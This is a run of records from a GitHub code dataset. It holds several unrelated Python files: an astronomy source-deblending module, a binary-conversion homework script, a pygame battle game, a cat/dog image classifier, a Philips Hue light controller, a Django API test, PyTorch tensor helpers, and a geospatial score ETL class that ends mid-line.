np.ma.masked_values(self.filtResp.sum(axis=0), 0)\n self.sources = np.sum(self.filtResp[:, None, :] * tmp_sources,\n axis=0) / weigthTot\n self.varSources = np.sum(self.filtResp[:, None, :] * tmp_var,\n axis=0) / weigthTot\n\n # for background, get voxel mean instead of sum\n self.sources[0] /= self.cube.data.size\n self.varSources[0] /= self.cube.data.size\n\n def _rebuildCube(self, tmp_sources):\n \"\"\"Create the estimated cube.\n\n We have to work on each MUSE spectral bin as the spatial\n distribution is different on each bin.\n\n \"\"\"\n estimatedCube = np.zeros((self.nlbda, np.prod(self.shapeLR)))\n weigthTot = np.ma.masked_values(self.filtResp.sum(axis=0), 0)\n filtResp = self.filtResp / weigthTot\n\n for i, (imin, imax) in enumerate(self.idxBands):\n estim = []\n for j, resp in enumerate(filtResp):\n arr = np.dot(tmp_sources[j][:, imin:imax].T,\n self.listIntensityMapLRConvol[j][i])\n arr *= resp[imin:imax][:, np.newaxis]\n estim.append(arr)\n\n estimatedCube[imin:imax, :] = np.sum(estim, axis=0)\n\n self.estimatedCube = self.cube.clone()\n self.estimatedCube.data = estimatedCube.reshape(self.cube.shape)\n\n def _getResiduals(self):\n self.residuals = self.cube.data - self.estimatedCube.data\n\n def _getContinuumCube(self, tmp_sources, w=101):\n \"\"\"\n Build continuum cube by median filtering (much faster here as it is\n done on objects spectra instead of all pixel spectra)\n \"\"\"\n self.sourcesCont = ssl.medfilt(self.sources, kernel_size=(1, w))\n self.tmp_sourcesCont = [ssl.medfilt(tmp_source, kernel_size=(1, w))\n for tmp_source in tmp_sources]\n self.estimatedCubeCont = self._rebuildCube(self.tmp_sourcesCont)\n\n @property\n def Xi2_tot(self):\n return (1 / (self.residuals.size - 3) *\n np.sum(self.residuals**2 / self.cube.var))\n\n def calcXi2_source(self, k):\n mask = self.listIntensityMapLRConvol[0][0][k].reshape(self.shapeLR) > 0\n return (1 / (self.residuals[:, mask].size - 3) *\n np.sum(self.residuals[:, mask]**2 / self.cube.var[:, mask]))\n\n def calcCondNumber(self, listobj=None):\n \"\"\"Compute condition number.\"\"\"\n if listobj is None:\n mat = np.array(self.listIntensityMapLRConvol[0][0][1:])\n else:\n mat = np.array(self.listIntensityMapLRConvol[0][0][listobj][1:])\n\n mat /= mat.sum(axis=1)[:, None]\n return np.linalg.cond(mat)\n\n def write(self, outfile, conf, timestamp):\n group = self.group\n origin = ('Odhin', __version__, self.cube.filename,\n self.cube.primary_header.get('CUBE_V', ''))\n src = Source.from_data(group.ID, group.region.ra, group.region.dec,\n origin=origin)\n\n idxSources = [k for k, iden in enumerate(self.listHST_ID)\n if iden in group.listSources]\n cond_number = self.calcCondNumber(idxSources)\n src.header['GRP_ID'] = group.ID\n src.header['GRP_AREA'] = group.region.area\n src.header['GRP_NSRC'] = group.nbSources\n src.header['COND_NB'] = cond_number\n src.header['XI2_TOT'] = self.Xi2_tot\n\n # we add a timestamp which allows to control that the sources are\n # consistent with a given catalog\n src.header['ODH_TS'] = timestamp\n\n # add spectra from objects in the blob\n for k, iden in enumerate(self.listHST_ID):\n if iden in group.listSources:\n sp = Spectrum(data=self.sources[k], var=self.varSources[k],\n wave=self.cube.wave, copy=False)\n src.spectra[iden] = sp\n\n # build sources table\n ids = [f'bg_{group.ID}' if id_ == 'bg' else id_\n for id_ in self.listHST_ID]\n rows = [(ids[k], group.ID, self.calcXi2_source(k))\n for k in idxSources]\n t = Table(rows=rows, names=('id', 'group_id', 'xi2'))\n t['group_area'] = group.region.area\n t['nb_sources'] = group.nbSources\n t['condition_number'] = cond_number\n t['xi2_group'] = self.Xi2_tot\n src.tables['sources'] = t\n\n # save cubes and images\n src.cubes['MUSE'] = self.cube\n src.cubes['FITTED'] = self.estimatedCube\n\n src.images['MUSE_WHITE'] = self.cube.mean(axis=0)\n src.images['FITTED'] = self.estimatedCube.mean(axis=0)\n src.images['LABEL'] = self.imLabel\n\n # save params\n src.header.add_comment('')\n src.header.add_comment('ODHIN PARAMETERS:')\n src.header.add_comment('')\n for line in yaml.dump(conf).splitlines():\n src.header.add_comment(line)\n\n src.write(outfile)\n","repo_name":"musevlt/odhin","sub_path":"odhin/deblend.py","file_name":"deblend.py","file_ext":"py","file_size_in_byte":18558,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"11819198829","text":"# Напишите программу, которая будет преобразовывать десятичное число в двоичное.\n\n# Пример:\n\n# - 45 -> 101101\n# - 3 -> 11\n# - 2 -> 10\n\nnumber = int(input(\"Введите число в десятичной системе счисления: \"))\n\nif number == 0:\n print(0)\nelse:\n line = \"\"\n while number > 1:\n rest = str(number % 2)\n number = number // 2\n line += rest\n number = str(number)\n line += number\n print(int(''.join(reversed(line))))","repo_name":"ggscream/python_homework_3","sub_path":"Task_4.py","file_name":"Task_4.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19703957520","text":"from settings import *\r\nimport pygame,random\r\nfrom enemy import Enemy\r\nfrom healtbar import Healtbar\r\nfrom knight import Knight\r\nfrom buttons import Buttons\r\nfrom pygame import mixer\r\npygame.init()\r\nmixer.init()\r\n#load image\r\nbg = pygame.image.load('bg_forest.png')\r\n\r\n\r\n#assignments\r\nenemy1 = Enemy(500,screen_height - panel - 62,\"LightBandit\",\"Bandit\", 100,10,1)\r\nenemy2 = Enemy(600,screen_height - panel - 62,\"LightBandit\",\"Bandit\", 100,10,1)\r\nchar = Knight(100,screen_height - panel - 62,\"Knight\", 100,25,3)\r\nhp_bar_char = Healtbar(106,screen_height - panel + 40,char.hp,char.max_hp)\r\nhp_bar_enemy1 = Healtbar(525,screen_height - panel + 40,enemy1.hp,enemy1.max_hp)\r\nhp_bar_enemy2 = Healtbar(525,screen_height - panel + 110,enemy2.hp,enemy2.max_hp)\r\nbuttons = Buttons(15,screen_height-33)\r\ndamage_deal_group = pygame.sprite.Group()\r\nmixer.music.load(\"pokemon_song.mp3\")\r\nmixer.music.set_volume(0.05)\r\ngame_over = False\r\n\r\n\r\ndef font(win,text,color,pos):\r\n text = char_font.render(text,True,color)\r\n win.blit(text,pos)\r\n\r\n\r\ndef draw(win):\r\n win.blit(bg,(0,0))\r\n pygame.draw.rect(win, \"sienna4\",pygame.Rect(0,screen_height-panel,screen_width//2,panel))\r\n pygame.draw.rect(win, \"sienna4\", pygame.Rect(screen_width//2, screen_height - panel, screen_width // 2, panel))\r\n pygame.draw.line(win, \"black\",(screen_width//2,screen_height-panel),(screen_width//2,screen_height),6)\r\n char.draw(win)\r\n enemy1.draw(win)\r\n enemy2.draw(win)\r\n char.update()\r\n enemy1.update()\r\n enemy2.update()\r\n #text\r\n font(win,f'{char.name} HP: {char.hp}',\"yellow\",[140,screen_height-panel])\r\n font(win,f'{enemy1.name} HP: {enemy1.hp}',\"orange\",[560,screen_height-panel])\r\n font(win,f'{enemy2.name} HP: {enemy2.hp}', \"orange\",[560,screen_height-panel+74])\r\n #HP bar\r\n hp_bar_char.draw(char.hp)\r\n hp_bar_enemy1.draw(enemy1.hp)\r\n hp_bar_enemy2.draw(enemy2.hp)\r\n #buttons\r\n buttons.draw(win)\r\n #damage\r\n\r\n #screen update\r\n pygame.display.update()\r\n clock.tick(FPS)\r\n\r\nrunning = True\r\n\r\nif not game_over:\r\n mixer.music.play()\r\nwhile running:\r\n\r\n keys = pygame.key.get_pressed()\r\n draw(WIN)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n\r\n\r\n\r\n if not game_over:\r\n\r\n\r\n if enemy1.alive and enemy2.alive and char.turn and not enemy1.turn and not enemy2.turn:\r\n if enemy1.alive and enemy2.alive:\r\n random_list = [enemy1, enemy2]\r\n buttons.click(char, random.choice(random_list),enemy1,enemy2)\r\n\r\n if enemy1.alive:\r\n buttons.pot(char)\r\n\r\n if enemy2.alive:\r\n buttons.pot(char)\r\n\r\n if enemy1.turn or enemy2.turn:\r\n buttons.pot_used = False\r\n buttons.y_heal = screen_height - panel - 180\r\n if enemy1.alive == False and char.turn:\r\n buttons.click(char, enemy2,enemy1,enemy2)\r\n\r\n elif enemy2.alive == False and char.turn:\r\n buttons.click(char, enemy1,enemy1,enemy2)\r\n\r\n if not char.turn:\r\n if char.alive:\r\n if enemy1.turn and enemy1.alive and not char.turn:\r\n enemy1.attack(char,char.rect.right -120 ,500)\r\n if enemy1.turn == False:\r\n if enemy2.alive == False:\r\n char.turn = True\r\n else:\r\n enemy2.turn = True\r\n if enemy1.alive == False:\r\n enemy2.turn = True\r\n if enemy2.turn and not char.turn and enemy2.alive:\r\n enemy2.attack(char, char.rect.right - 120 ,600)\r\n if enemy2.turn == False:\r\n char.turn = True\r\n\r\n if enemy1.alive == False and enemy2.alive == False:\r\n game_over = True\r\n\r\n elif char.alive == False:\r\n game_over = True\r\n\r\n\r\npygame.quit()\r\n\r\n","repo_name":"MiyazakiMehmet/darkest-dungeron-walter-white-edition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71581327122","text":"import asyncio\nimport numpy as np\nimport os\nimport cv2\nfrom tqdm import tqdm\nimport random\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Activation, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\n\nDATADIR = \"PetImages\"\nCATEGORIES = [\"Dog\", \"Cat\"]\nIMG_SIZE = 100\n\n\nclass Accuracy:\n def __init__(self, acc: float, category):\n \"\"\"Se la categoria è `gatto` allora la percentuale rimarrà la stessa\n Invece, se è `cane` allora deve essere invertita la percentuale\"\"\"\n self.cat = acc if category == \"Cat\" else 1 - acc\n self.dog = acc if category == \"Cat\" else 1 - acc\n\n\n# per scaricare il dataset vai su:\n# https://www.microsoft.com/en-us/download/confirmation.aspx?id=54765\n\n\ndef prepare_data(filepath):\n img_array = cv2.imread(\n filepath, cv2.IMREAD_GRAYSCALE\n ) # legge l'immagine e la converte in scala grigi\n new_array = cv2.resize(\n img_array, (IMG_SIZE, IMG_SIZE)\n ) # ridimensiona l'immagine per ottenere le dimensioni che si aspetta il modello\n return new_array.reshape(\n -1, IMG_SIZE, IMG_SIZE, 1\n ) # ritorna l'immagine con la forma che si aspetta il modello\n\n\ndef create_training_data():\n training_data = []\n for category in CATEGORIES: # cani e gatti\n path = os.path.join(DATADIR, category) # crea un percorso ai cani e gatti\n class_num = CATEGORIES.index(\n category\n ) # ricevi una classificazione (0 o 1). 0=cane 1=gatto\n for img in tqdm(os.listdir(path)): # itera per ogni immagine di cani e gatti\n try:\n img_array = cv2.imread(\n os.path.join(path, img), cv2.IMREAD_GRAYSCALE\n ) # converti in array\n new_array = cv2.resize(\n img_array, (IMG_SIZE, IMG_SIZE)\n ) # normalizza i dati\n training_data.append(\n [new_array, class_num]\n ) # aggiungi ai dati di allenamento\n except Exception as e: # meglio prevenire che curare\n pass\n random.shuffle(\n training_data\n ) # mischia i dati per evitare che il modello venga allenato male\n return training_data\n\n\ndef train():\n x = []\n y = []\n for features, label in create_training_data():\n x.append(features)\n y.append(label)\n x = np.array(x).reshape(-1, IMG_SIZE, IMG_SIZE, 1)\n x = x / 255.0\n x = np.array(x) # bisogna ricreare l'array\n y = np.array(y)\n model = Sequential()\n model.add(Conv2D(64, (3, 3), input_shape=x.shape[1:]))\n model.add(Activation(\"relu\"))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n # 3 conv layers -- START --\n # 1:\n model.add(Conv2D(64, (3, 3)))\n model.add(Activation(\"relu\"))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n # 2:\n model.add(Conv2D(64, (3, 3)))\n model.add(Activation(\"relu\"))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n # 3:\n model.add(Conv2D(64, (3, 3)))\n model.add(Activation(\"relu\"))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n # 3 conv layers -- END --\n model.add(\n Flatten()\n ) # questo converte la nostra mappa delle feature in 3D ad un vettore di feature in 1D\n model.add(Dense(1))\n model.add(Activation(\"sigmoid\"))\n model.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=[\"accuracy\"])\n model.fit(x, y, batch_size=32, epochs=10)\n model.save(\"cat_or_dog.model\")\n return model\n\n\ndef get_model():\n if not os.path.exists(\"cat_or_dog.model\"):\n model = train()\n else:\n model = tf.keras.models.load_model(\"cat_or_dog.model\")\n return model\n\n\ndef predict(model: Sequential, filepath):\n prediction = model.predict([prepare_data(filepath)])\n category = CATEGORIES[round(prediction[0][0])]\n return category, Accuracy(prediction[0][0], category)\n\n\n# test\ndef test():\n model = get_model()\n prediction = predict(model, \"./dog_0.jpg\")\n print(f\"Type expected: Dog; Acc: {prediction[1].dog * 100: .2f}%\")\n prediction = predict(model, \"./cat_0.jpg\")\n print(f\"Type expected: Cat; Acc: {prediction[1].cat * 100: .2f}%\")\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n loop.run_until_complete(test())\n","repo_name":"Enn3Developer/cat_or_dog","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"25732180109","text":"import random\nfrom typing import List\nfrom typing import overload\nfrom typing import Tuple\n\nimport numpy\nimport torch\n\n\ndef tensor_is_empty(x: torch.Tensor) -> bool:\n \"\"\"Return whether the tensor is empty.\"\"\"\n return 0 in x.shape\n\n\ndef same_storage(\n x: torch.Tensor, y: torch.Tensor, empty_does_not_share_storage: bool = True\n) -> bool:\n \"\"\"Checks if two tensors share storage.\n\n :param x: first tensor\n :param y: second tensor\n :param empty_does_not_share_storage: if True (default), will return False if\n either tensor is empty (despite that they technically data_ptr are the same).\n :return: if the tensor shares the same storage\n \"\"\"\n if empty_does_not_share_storage and (tensor_is_empty(x) or tensor_is_empty(y)):\n return False\n x_ptrs = {e.data_ptr() for e in x.flatten()}\n y_ptrs = {e.data_ptr() for e in y.flatten()}\n return (x_ptrs <= y_ptrs) or (y_ptrs <= x_ptrs)\n\n\ndef deterministic_seed(seed: int, cudnn_deterministic: bool = False):\n random.seed(seed)\n numpy.random.seed(seed)\n torch.manual_seed(seed)\n if cudnn_deterministic:\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n\n@overload\ndef to_one_hot(arr: numpy.ndarray, mx: int) -> numpy.ndarray:\n ...\n\n\ndef to_one_hot(arr: torch.tensor, mx: int) -> torch.tensor:\n if torch.is_tensor(arr):\n\n oh = torch.zeros((arr.shape[0], mx))\n else:\n oh = numpy.zeros((arr.shape[0], mx))\n for i, a in enumerate(arr):\n oh[i, a] = 1.0\n return oh\n\n\ndef stable_arg_sort(arr, mn: float, mx: float):\n dim = -1\n if not dim == -1:\n raise ValueError(\"only last dimension sort is supported. Try reshaping tensor.\")\n delta_shape = list(arr.shape)\n delta_shape[dim] = 1\n delta = torch.linspace(mn, mx, arr.shape[dim], device=arr.device)\n delta = delta.repeat(delta_shape)\n return torch.argsort(arr + delta, dim=dim)\n\n\ndef stable_arg_sort_long(arr):\n \"\"\"Stable sort of long tensors.\n\n Note that Pytorch 1.5.0 does not have a stable sort implementation.\n Here we simply add a delta value between 0 and 1 (exclusive) and\n assuming we are using integers, call torch.argsort to get a stable\n sort.\n \"\"\"\n if not (arr.dtype == torch.long or arr.dtype == torch.int):\n raise ValueError(\"only torch.Long or torch.Int allowed\")\n return stable_arg_sort(arr, 0.0, 0.99)\n\n\ndef torch_scatter_group(\n x: torch.Tensor, idx: torch.Tensor\n) -> Tuple[torch.Tensor, List[torch.Tensor]]:\n \"\"\"Group a tensor by indices. This is equivalent to successive applications\n of `x[torch.where(x == index)]` for all provided sorted indices.\n\n Example:\n\n .. code-block::\n\n idx = torch.tensor([2, 2, 0, 1, 1, 1, 2])\n x = torch.tensor([0, 1, 2, 3, 4, 5, 6])\n\n uniq_sorted_idx, out = scatter_group(x, idx)\n\n # node the idx is sorted\n assert torch.all(torch.eq(out[0], torch.tensor([0, 1, 2])))\n\n # where idx == 0\n assert torch.all(torch.eq(out[1][0], torch.tensor([2])))\n\n # where idx == 1\n assert torch.all(torch.eq(out[1][1], torch.tensor([3, 4, 5])))\n\n # where idx == 2\n assert torch.all(torch.eq(out[1][2], torch.tensor([0, 1, 6])))\n\n :param x: tensor to group\n :param idx: indices\n :return: tuple of unique, sorted indices and a list of tensors corresponding to the groups\n \"\"\"\n arg = stable_arg_sort_long(idx)\n x = x[arg]\n groups, b = torch.unique(idx, return_counts=True)\n i_a = 0\n arr_list = []\n for i_b in b:\n arr_list.append(x[i_a : i_a + i_b.item()])\n i_a += i_b.item()\n return groups, arr_list\n\n\ndef long_isin(ar1, ar2, assume_unique: bool = False, invert: bool = False):\n dim = -1\n if ar1.dtype != torch.long or ar2.dtype != torch.long:\n raise ValueError(\"Arrays be torch.LongTensor\")\n if ar2.ndim > 1:\n raise ValueError(\n \"Unable to broadcast shape {}. Second tensor must be a \"\n \"1-dimensional.\".format(ar2.shape)\n )\n\n # Otherwise use sorting\n if not assume_unique:\n ar1, rev_idx = torch.unique(ar1, return_inverse=True)\n ar2 = torch.unique(ar2, dim=None)\n # TODO: how to handle repeats and unique in multidimensional tensor?\n\n # if ar2.ndim > 1:\n # s = list(ar2.shape)\n # s[dim] = 1\n # ar1 = ar1.repeat(s)\n ar = torch.cat((ar1, ar2), axis=dim)\n\n # We need this to be a stable sort\n order = stable_arg_sort_long(ar)\n sar = torch.gather(ar, dim, order)\n if invert:\n bool_ar = sar[1:] != sar[:-1]\n else:\n bool_ar = sar[1:] == sar[:-1]\n flag = torch.cat((bool_ar, torch.tensor([invert])))\n ret = torch.empty(ar.shape, dtype=bool)\n ret[order] = flag\n\n if assume_unique:\n return ret[: len(ar1)]\n else:\n return ret[rev_idx]\n","repo_name":"jvrana/caldera","sub_path":"caldera/utils/tensor.py","file_name":"tensor.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"12817199587","text":"import requests\nimport json\n\n\n# REFERENCE: https://developers.meethue.com/develop/get-started-2/\nclass HueController(object):\n def __init__(self):\n self.user = '7wl8U1CnKZlk6kE8WHPzCQatw5VqWb0oiqjZFinR'\n self.api_base = f'http://192.168.1.4/api/{self.user}'\n self.group_map = {}\n self.light_map = {}\n self.group_aliases = {\n 'Lamp': [\n 'living room',\n 'livingroom',\n 'lamp'\n ],\n 'Bedroom': [\n 'bed room',\n 'bedroom',\n 'master bedroom',\n 'master bed room'\n ],\n 'Craft Room': [\n 'office',\n 'craftroom',\n 'craft room'\n ]\n }\n self._init_states()\n\n def _init_states(self):\n groups = self.get_groups()\n if groups.status_code != 200:\n print(f'Cannot reach Hue bridge at {self._build_url([\"groups\"])}')\n exit(1)\n for id, group in groups.json().items():\n self.group_map[group['name']] = id\n lights = self.get_lights()\n if lights.status_code != 200:\n print(f'Cannot reach Hue bridge at {self._build_url([\"lights\"])}')\n exit(1)\n for id, light in lights.json().items():\n self.light_map[light['name']] = id\n\n def _build_url(self, parts: list) -> str:\n return '/'.join([self.api_base, *parts])\n\n def _clamp_brightness(self, bright: int) -> int:\n return max(0, min(int(254 * (bright / 100)), 254))\n\n def get_lights(self) -> requests.Response:\n return requests.get(\n url=self._build_url(['lights'])\n )\n\n def _get_light_id(self, name: str) -> str:\n if name not in self.light_map.keys():\n print(f'ERROR: Cannot find Light named {name}')\n exit(1)\n return str(self.light_map[name])\n\n def get_light_by_name(self, name: str) -> requests.Response:\n return requests.get(\n url=self._build_url(['lights', self._get_light_id(name)])\n )\n\n def turn_on_light(self, id: str, bright: int = None) -> requests.Response:\n body = {'on': True}\n if bright is not None:\n body['bri': self._clamp_brightness(bright)]\n return requests.put(\n url=self._build_url(['lights', id, 'state']),\n data=json.dumps(body)\n )\n\n def turn_off_light(self, id: str) -> requests.Response:\n return requests.put(\n url=self._build_url(['lights', id, 'state']),\n data=json.dumps({'on': False})\n )\n\n def _set_light_bright(self, id: str, bright: int) -> requests.Response:\n return requests.put(\n url=self._build_url(['lights', id, 'state']),\n data=json.dumps({'bri': bright})\n )\n\n def get_groups(self) -> requests.Response:\n return requests.get(\n url=self._build_url(['groups'])\n )\n\n def get_group_names(self) -> list:\n resp = self.get_groups()\n if resp.status_code != 200:\n print('Cannot reach Hue bridge to get Groups!')\n exit(1)\n return [group['name'] for group in resp.json().values()]\n\n def _get_group_id(self, name: str) -> str:\n group_name = self._group_name_from_alias(name)\n if group_name == '':\n print(f'ERROR: Cannot find Group named {name}')\n exit(1)\n return str(self.group_map[group_name])\n\n def _group_name_from_alias(self, alias: str) -> str:\n for group, aliases in self.group_aliases.items():\n if alias == group.lower() or alias in aliases:\n return group\n return ''\n\n def get_group_by_name(self, name: str) -> requests.Response:\n return requests.get(\n url=self._build_url(['groups', self._get_group_id(name)])\n )\n\n def turn_on_group(self, name: str, bright=None) -> requests.Response:\n # If we are setting the brightness, we should set all the lights\n # before turning them on, otherwise use previous brightness\n if bright is not None:\n bright = self._clamp_brightness(bright)\n else:\n bright = self._clamp_brightness(100)\n group = self.get_group_by_name(name).json()\n if not group['state']['all_on']:\n body = {'on': True, 'bri': self._clamp_brightness(bright)}\n requests.put(\n url=self._build_url(\n ['groups', self._get_group_id(name), 'action']\n ),\n data=json.dumps(body)\n )\n for light_id in group['lights']:\n resp = self._set_light_bright(light_id, bright)\n if resp.status_code != 200:\n print(f'ERROR: Could not access Light {light_id}')\n\n def turn_off_group(self, name: str) -> requests.Response:\n return requests.put(\n url=self._build_url(\n ['groups', self._get_group_id(name), 'action']\n ),\n data=json.dumps({'on': False})\n )\n","repo_name":"3digitdev/iota","sub_path":"iota/modules/PhilipsHue/HueController.py","file_name":"HueController.py","file_ext":"py","file_size_in_byte":5084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29031042857","text":"import mock\nimport pytest\n\n\n@pytest.mark.django_db\n@mock.patch('wiki.sync.cloud.views.create_organization.create_new_org_in_cloud')\n@mock.patch('wiki.sync.cloud.views.create_organization.ensure_cloud_org_in_connect')\ndef test_create_organization(ensure_org, _, client, wiki_users, groups):\n client.login(wiki_users.thasonic)\n\n dir_id = 1234\n ensure_org.return_value = dir_id\n\n response = client.post('/_api/svc/cloud/.create_organization', data={'org_name': 'my_org', 'user_iam_token': 'any'})\n assert response.status_code == 200, response.json()\n assert response.json()['data'] == {'success': True, 'org_id': dir_id}\n\n response = client.post('/_api/svc/cloud/.create_organization', data={'user_iam_token': 'any'})\n assert response.status_code == 409\n\n response = client.post('/_api/svc/cloud/.create_organization', data={'org_name': 'blabla'})\n assert response.status_code == 409\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/wiki_tests/flavor_specific/biz/api_svc/test_create_organization.py","file_name":"test_create_organization.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3771372503","text":"import concurrent.futures\nimport math\nimport os\n\nimport geopandas as gpd\nimport numpy as np\nimport pandas as pd\nfrom data_pipeline.content.schemas.download_schemas import CSVConfig\nfrom data_pipeline.etl.base import ExtractTransformLoad\nfrom data_pipeline.etl.score import constants\nfrom data_pipeline.etl.score.etl_utils import check_score_data_source\nfrom data_pipeline.etl.sources.census.etl_utils import check_census_data_source\nfrom data_pipeline.score import field_names\nfrom data_pipeline.utils import get_module_logger\nfrom data_pipeline.utils import load_dict_from_yaml_object_fields\nfrom data_pipeline.utils import load_yaml_dict_from_file\nfrom data_pipeline.utils import zip_files\nfrom data_pipeline.etl.datasource import DataSource\n\nlogger = get_module_logger(__name__)\n\n\nclass GeoScoreETL(ExtractTransformLoad):\n \"\"\"\n A class used to generate per state and national GeoJson files with the score baked in\n \"\"\"\n\n def __init__(self, data_source: str = None):\n self.DATA_SOURCE = data_source\n self.SCORE_GEOJSON_PATH = self.DATA_PATH / \"score\" / \"geojson\"\n self.SCORE_LOW_GEOJSON = self.SCORE_GEOJSON_PATH / \"usa-low.json\"\n self.SCORE_HIGH_GEOJSON = self.SCORE_GEOJSON_PATH / \"usa-high.json\"\n\n self.SCORE_SHP_PATH = self.DATA_PATH / \"score\" / \"shapefile\"\n self.SCORE_SHP_FILE = self.SCORE_SHP_PATH / \"usa.shp\"\n\n self.SCORE_CSV_PATH = self.DATA_PATH / \"score\" / \"csv\"\n self.TILE_SCORE_CSV = self.SCORE_CSV_PATH / \"tiles\" / \"usa.csv\"\n\n self.CENSUS_USA_GEOJSON = (\n self.DATA_PATH / \"census\" / \"geojson\" / \"us.json\"\n )\n\n # Import the shortened name for Score N to be used on tiles.\n # We should no longer be using PFS\n\n ## TODO: We really should not have this any longer changing\n self.TARGET_SCORE_SHORT_FIELD = constants.TILES_SCORE_COLUMNS[\n field_names.FINAL_SCORE_N_BOOLEAN\n ]\n self.TARGET_SCORE_RENAME_TO = \"SCORE\"\n\n # Import the shortened name for tract (\"GTF\") that's used on the tiles.\n self.TRACT_SHORT_FIELD = constants.TILES_SCORE_COLUMNS[\n field_names.GEOID_TRACT_FIELD\n ]\n self.GEOMETRY_FIELD_NAME = \"geometry\"\n self.LAND_FIELD_NAME = \"ALAND10\"\n\n # We will adjust this upwards while there is some fractional value\n # in the score. This is a starting value.\n self.NUMBER_OF_BUCKETS = 10\n self.HOMOGENEITY_THRESHOLD = 200\n self.HIGH_LOW_ZOOM_CENSUS_TRACT_THRESHOLD = 150\n\n self.geojson_usa_df: gpd.GeoDataFrame\n self.score_usa_df: pd.DataFrame\n self.geojson_score_usa_high: gpd.GeoDataFrame\n self.geojson_score_usa_low: gpd.GeoDataFrame\n\n def get_data_sources(self) -> [DataSource]:\n return (\n []\n ) # we have all prerequisite sources locally as a result of generating the previous steps in the pipeline\n\n def extract(self, use_cached_data_sources: bool = False) -> None:\n\n # check census data\n check_census_data_source(\n census_data_path=self.DATA_PATH / \"census\",\n census_data_source=self.DATA_SOURCE,\n )\n\n # check score data\n check_score_data_source(\n score_csv_data_path=self.SCORE_CSV_PATH,\n score_data_source=self.DATA_SOURCE,\n )\n\n logger.info(\"Reading US GeoJSON (~6 minutes)\")\n full_geojson_usa_df = gpd.read_file(\n self.CENSUS_USA_GEOJSON,\n dtype={self.GEOID_FIELD_NAME: \"string\"},\n usecols=[\n self.GEOID_FIELD_NAME,\n self.GEOMETRY_FIELD_NAME,\n self.LAND_FIELD_NAME,\n ],\n low_memory=False,\n )\n\n # We only want to keep tracts to visualize that have non-0 land\n self.geojson_usa_df = full_geojson_usa_df[\n full_geojson_usa_df[self.LAND_FIELD_NAME] > 0\n ]\n\n logger.info(\"Reading score CSV\")\n self.score_usa_df = pd.read_csv(\n self.TILE_SCORE_CSV,\n dtype={\n self.TRACT_SHORT_FIELD: str,\n },\n low_memory=False,\n )\n\n def transform(self) -> None:\n # Rename GEOID10_TRACT to GEOID10 on score to allow merging with Census GeoJSON\n self.score_usa_df.rename(\n columns={self.TRACT_SHORT_FIELD: self.GEOID_FIELD_NAME},\n inplace=True,\n )\n\n logger.info(\"Pruning Census GeoJSON\")\n fields = [self.GEOID_FIELD_NAME, self.GEOMETRY_FIELD_NAME]\n\n # TODO update this join\n logger.info(\"Merging and compressing score csv with USA GeoJSON\")\n self.geojson_score_usa_high = self.score_usa_df.set_index(\n self.GEOID_FIELD_NAME\n ).merge(\n self.geojson_usa_df[fields].set_index(self.GEOID_FIELD_NAME),\n left_index=True,\n right_index=True,\n how=\"left\",\n )\n\n self.geojson_score_usa_high = gpd.GeoDataFrame(\n self.geojson_score_usa_high, crs=\"EPSG:4326\"\n )\n\n usa_simplified = self.geojson_score_usa_high[\n [\n self.TARGET_SCORE_SHORT_FIELD,\n self.GEOMETRY_FIELD_NAME,\n ]\n ].reset_index()\n\n usa_tracts = usa_simplified.rename(\n columns={self.TARGET_SCORE_SHORT_FIELD: self.TARGET_SCORE_RENAME_TO}\n )\n\n logger.info(\"Converting GeoJSON into GeoDataFrame with tracts\")\n usa_tracts = gpd.GeoDataFrame(\n usa_tracts,\n columns=[\n self.TARGET_SCORE_RENAME_TO,\n self.GEOMETRY_FIELD_NAME,\n self.GEOID_FIELD_NAME,\n ],\n crs=\"EPSG:4326\",\n )\n\n logger.debug(\"Creating buckets from tracts\")\n usa_bucketed, keep_high_zoom_df = self._create_buckets_from_tracts(\n usa_tracts, self.NUMBER_OF_BUCKETS\n )\n\n logger.debug(\"Aggregating buckets\")\n usa_aggregated = self._aggregate_buckets(usa_bucketed, agg_func=\"mean\")\n\n logger.debug(\"Breaking up polygons\")\n compressed = self._breakup_multipolygons(\n usa_aggregated, self.NUMBER_OF_BUCKETS\n )\n\n self.geojson_score_usa_low = self._join_high_and_low_zoom_frames(\n compressed, keep_high_zoom_df\n )\n\n # round to 2 decimals\n self.geojson_score_usa_low = self.geojson_score_usa_low.round(\n {self.TARGET_SCORE_RENAME_TO: 2}\n )\n\n def _create_buckets_from_tracts(\n self, initial_state_tracts: gpd.GeoDataFrame, num_buckets: int\n ):\n # First, we remove any states that have under the threshold of census tracts\n # from being aggregated (right now, this just removes Wyoming)\n highzoom_state_tracts = initial_state_tracts.reset_index()\n highzoom_state_tracts[\"state\"] = highzoom_state_tracts[\n self.GEOID_FIELD_NAME\n ].str[:2]\n keep_high_zoom = highzoom_state_tracts.groupby(\"state\")[\n self.GEOID_FIELD_NAME\n ].transform(\n lambda x: x.count() <= 